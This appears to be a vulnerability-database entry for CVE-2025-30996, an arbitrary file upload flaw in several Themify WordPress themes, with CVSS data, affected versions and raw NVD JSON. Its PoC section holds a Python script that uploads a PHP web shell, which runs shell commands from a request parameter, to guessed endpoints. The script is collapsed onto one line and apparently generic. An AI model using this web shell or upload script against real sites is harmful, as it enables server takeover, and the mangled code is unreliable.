Security Vulnerability Report
中文
CVE-2025-30996 CVSS 9.9 CRITICAL

CVE-2025-30996

Published: 2026-01-06 21:15:43
Last Modified: 2026-04-28 19:30:53
Source: [email protected]

Description

Unrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Sidepane WordPress Theme, Themify Themify Newsy, Themify Themify Folo, Themify Themify Edmin, Themify Bloggie, Themify Photobox, Themify Wigi, Themify Rezo, Themify Slide allows Upload a Web Shell to a Web Server.This issue affects Themify Sidepane WordPress Theme: from n/a through 1.9.8; Themify Newsy: from n/a through 1.9.9; Themify Folo: from n/a through 1.9.6; Themify Edmin: from n/a through 2.0.0; Bloggie: from n/a through 2.0.8; Photobox: from n/a through 2.0.1; Wigi: from n/a through 2.0.1; Rezo: from n/a through 1.9.7; Slide: from n/a through 1.7.5.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Themify Sidepane WordPress Theme < 1.9.9
Themify Newsy < 1.9.10
Themify Folo < 1.9.7
Themify Edmin < 2.0.1
Themify Bloggie < 2.0.9
Themify Photobox < 2.0.2
Themify Wigi < 2.0.2
Themify Rezo < 1.9.8
Themify Slide < 1.7.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-30996 PoC - Arbitrary File Upload in Themify WordPress Themes # Target: Themify themes with vulnerable file upload functionality target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # Web Shell content - basic PHP backdoor web_shell = '''<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; } ?>''' # Construct multipart form data for file upload files = { 'file': ('shell.php', web_shell, 'application/x-php') } # Try common upload endpoints endpoints = [ '/wp-admin/admin-ajax.php', '/wp-admin/admin.php', '/wp-content/themes/*/includes/upload.php', ] print(f'[*] Testing CVE-2025-30996 on {target_url}') for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.post(url, files=files, timeout=10) if response.status_code == 200: print(f'[+] Possible upload success at: {url}') print(f'[+] Response: {response.text[:200]}') except Exception as e: print(f'[-] Error testing {url}: {str(e)}') print('[*] Note: This is a simplified PoC. Actual exploitation may require authentication and specific parameter names.')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30996", "sourceIdentifier": "[email protected]", "published": "2026-01-06T21:15:42.560", "lastModified": "2026-04-28T19:30:52.727", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Sidepane WordPress Theme, Themify Themify Newsy, Themify Themify Folo, Themify Themify Edmin, Themify Bloggie, Themify Photobox, Themify Wigi, Themify Rezo, Themify Slide allows Upload a Web Shell to a Web Server.This issue affects Themify Sidepane WordPress Theme: from n/a through 1.9.8; Themify Newsy: from n/a through 1.9.9; Themify Folo: from n/a through 1.9.6; Themify Edmin: from n/a through 2.0.0; Bloggie: from n/a through 2.0.8; Photobox: from n/a through 2.0.1; Wigi: from n/a through 2.0.1; Rezo: from n/a through 1.9.7; Slide: from n/a through 1.7.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/theme/bloggie/vulnerability/wordpress-bloggie-2-0-8-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}, {"url": "https://patchstack.com/database/wordpress/theme/edmin/vulnerability/wordpress-themify-edmin-2-0-0-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}, {"url": "https://patchstack.com/database/wordpress/theme/folo/vulnerability/wordpress-themify-folo-1-9-6-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}, {"url": "https://patchstack.com/database/wordpress/theme/newsy/vulnerability/wordpress-themify-newsy-1-9-9-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}, {"url": "https://patchstack.com/database/wordpress/theme/photobox/vulnerability/wordpress-photobox-2-0-1-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}, {"url": "https://patchstack.com/database/wordpress/theme/rezo/vulnerability/wordpress-rezo-1-9-7-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}, {"url": "https://patchstack.com/database/wordpress/theme/sidepane/vulnerability/wordpress-themify-sidepane-wordpress-theme-1-9-8-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}, {"url": "https://patchstack.com/database/wordpress/theme/slide/vulnerability/wordpress-slide-1-7-5-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}, {"url": "https://patchstack.com/database/wordpress/theme/wigi/vulnerability/wordpress-wigi-2-0-1-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.